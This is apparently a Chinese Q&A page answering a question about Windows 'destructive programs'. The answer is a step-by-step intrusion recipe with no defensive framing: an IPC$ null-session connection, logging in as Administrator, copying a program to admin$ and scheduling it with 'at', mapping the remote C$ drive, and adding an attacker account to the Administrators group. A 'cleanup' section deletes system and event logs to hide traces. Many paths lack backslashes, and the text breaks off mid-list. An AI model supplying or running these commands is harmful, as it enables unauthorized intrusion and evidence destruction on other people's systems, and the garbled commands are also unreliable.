windows 破坏性程序

来源:百度知道 编辑:UC知道 时间:2024/09/21 20:31:43
是什么,
那DOS下的破坏性程序呢

1.与远程主机建立空管连接 net use \IP地址ipc$ "" /use:""
以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator"
传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$
查看远程主机时间 net time \IP地址
定时启动某个程序 at \IP地址 02:18 readme.exe
查看共享 net view \IP地址
查看netbios工作组列表 nBTstat -A IP地址
将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator"
这两条把自己增加到管理员组: net user 用户名 密码 /add
net locaLGroup Administrators 用户名 /add
断开连接 net use \IP地址ipc$ /delete

扫尾:
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dTCLog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log

一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list \IP地址
netsvc schedule \IP地址 /query
netsvc